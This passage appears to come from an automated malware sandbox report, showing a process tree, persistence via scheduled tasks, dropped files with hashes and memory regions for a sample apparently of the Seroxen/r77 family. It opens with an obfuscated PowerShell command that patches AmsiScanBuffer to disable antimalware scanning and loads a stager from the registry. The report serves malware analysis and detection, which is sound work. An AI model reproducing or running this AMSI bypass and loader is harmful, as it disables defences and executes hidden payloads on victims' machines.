Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'at'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+'e'+'a'+''+'l'+''+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$qhAbXCVnFHg.DefineConstructor(''+[Char](82)+'TS'+'p'+'e'+[Char](99)+'i'+[Char](97)+''+'l'+'Na'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VPMBYccJGXgqMz).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$qhAbXCVnFHg.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+'N'+'e'+'w'+[Char](83)+'l'+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$wGhIKnHnmP,$VPMBYccJGXgqMz).SetImplementationFlags('Ru'+[Char](110)+''+'t'+'i'+'m'+'e,'+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $qhAbXCVnFHg.CreateType();}$XCFOCJjzddzeE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'ati'+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'t'+'h'+'o'+[Char](100)+'s');$DjFQGWrBdomHzk=$XCFOCJjzddzeE.GetMethod(''+[Char](71)+'e'+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+'d'+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'St'+'a'+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RhLMjGGNbJINbcLeWpo=kGFIBnmTqOaK @([String])([IntPtr]);$XgeKkfomnnhYLmJRcZhhDU=kGFIBnmTqOaK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zJQKgzGRkLM=$XCFOCJjzddzeE.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+'dule'+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'ll')));$WtnbtgjnmGLDwp=$DjFQGWrBdomHzk.Invoke($Null,@([Object]$zJQKgzGRkLM,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$fyoXhgABJzKWrZrLk=$DjFQGWrBdomHzk.Invoke($Null,@([Object]$zJQKgzGRkLM,[Object]('Vi'+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$RWZrYUe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WtnbtgjnmGLDwp,$RhLMjGGNbJINbcLeWpo).Invoke(''+'a'+'m'+[Char](115)+'i'+[Char](46)+''+[Char](100)+'ll');$clfrGMfKnPIsswLYT=$DjFQGWrBdomHzk.Invoke($Null,@([Object]$RWZrYUe,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iS'+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ghLCqnwclk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fyoXhgABJzKWrZrLk,$XgeKkfomnnhYLmJRcZhhDU).Invoke($clfrGMfKnPIsswLYT,[uint32]8,4,[ref]$ghLCqnwclk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$clfrGMfKnPIsswLYT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fyoXhgABJzKWrZrLk,$XgeKkfomnnhYLmJRcZhhDU).Invoke($clfrGMfKnPIsswLYT,[uint32]8,0x20,[ref]$ghLCqnwclk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exeFilesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
C:\Windows\Temp\__PSScriptPolicyTest_0n0ae04v.ksg.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b
-
memory/468-80-0x00000267A8CB0000-0x00000267A8CDB000-memory.dmpFilesize
172KB
-
memory/468-86-0x00000267A8CB0000-0x00000267A8CDB000-memory.dmpFilesize
172KB
-
memory/468-87-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmpFilesize
64KB
-
memory/644-47-0x0000026F9CEA0000-0x0000026F9CECB000-memory.dmpFilesize
172KB
-
memory/644-53-0x0000026F9CEA0000-0x0000026F9CECB000-memory.dmpFilesize
172KB
-
memory/644-54-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmpFilesize
64KB
-
memory/644-45-0x0000026F9CE70000-0x0000026F9CE95000-memory.dmpFilesize
148KB
-
memory/644-46-0x0000026F9CEA0000-0x0000026F9CECB000-memory.dmpFilesize
172KB
-
memory/696-64-0x0000019BD1EF0000-0x0000019BD1F1B000-memory.dmpFilesize
172KB
-
memory/696-58-0x0000019BD1EF0000-0x0000019BD1F1B000-memory.dmpFilesize
172KB
-
memory/696-65-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmpFilesize
64KB
-
memory/788-91-0x000001A55D8D0000-0x000001A55D8FB000-memory.dmpFilesize
172KB
-
memory/1000-75-0x0000026C31DC0000-0x0000026C31DEB000-memory.dmpFilesize
172KB
-
memory/1000-76-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmpFilesize
64KB
-
memory/1000-69-0x0000026C31DC0000-0x0000026C31DEB000-memory.dmpFilesize
172KB
-
memory/1212-30-0x0000022744C00000-0x0000022744C2A000-memory.dmpFilesize
168KB
-
memory/1212-32-0x00007FFA690D0000-0x00007FFA6918D000-memory.dmpFilesize
756KB
-
memory/1212-31-0x00007FFA6A2E0000-0x00007FFA6A4E9000-memory.dmpFilesize
2.0MB
-
memory/1212-21-0x000002272C740000-0x000002272C762000-memory.dmpFilesize
136KB
-
memory/1892-2-0x00000000054A0000-0x0000000005A46000-memory.dmpFilesize
5.6MB
-
memory/1892-5-0x0000000004E40000-0x0000000004EA6000-memory.dmpFilesize
408KB
-
memory/1892-6-0x0000000005B70000-0x0000000005B82000-memory.dmpFilesize
72KB
-
memory/1892-4-0x0000000074F00000-0x00000000756B1000-memory.dmpFilesize
7.7MB
-
memory/1892-0-0x0000000074F0E000-0x0000000074F0F000-memory.dmpFilesize
4KB
-
memory/1892-7-0x00000000060A0000-0x00000000060DC000-memory.dmpFilesize
240KB
-
memory/1892-3-0x0000000004EF0000-0x0000000004F82000-memory.dmpFilesize
584KB
-
memory/1892-1-0x0000000000310000-0x000000000037C000-memory.dmpFilesize
432KB
-
memory/1892-20-0x0000000074F00000-0x00000000756B1000-memory.dmpFilesize
7.7MB
-
memory/3484-35-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3484-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3484-40-0x00007FFA6A2E0000-0x00007FFA6A4E9000-memory.dmpFilesize
2.0MB
-
memory/3484-41-0x00007FFA690D0000-0x00007FFA6918D000-memory.dmpFilesize
756KB
-
memory/3484-33-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3484-34-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3484-38-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3484-36-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3552-13-0x0000000074F00000-0x00000000756B1000-memory.dmpFilesize
7.7MB
-
memory/3552-14-0x0000000074F00000-0x00000000756B1000-memory.dmpFilesize
7.7MB
-
memory/3552-672-0x0000000006E20000-0x0000000006E2A000-memory.dmpFilesize
40KB
-
memory/3552-1323-0x0000000074F00000-0x00000000756B1000-memory.dmpFilesize
7.7MB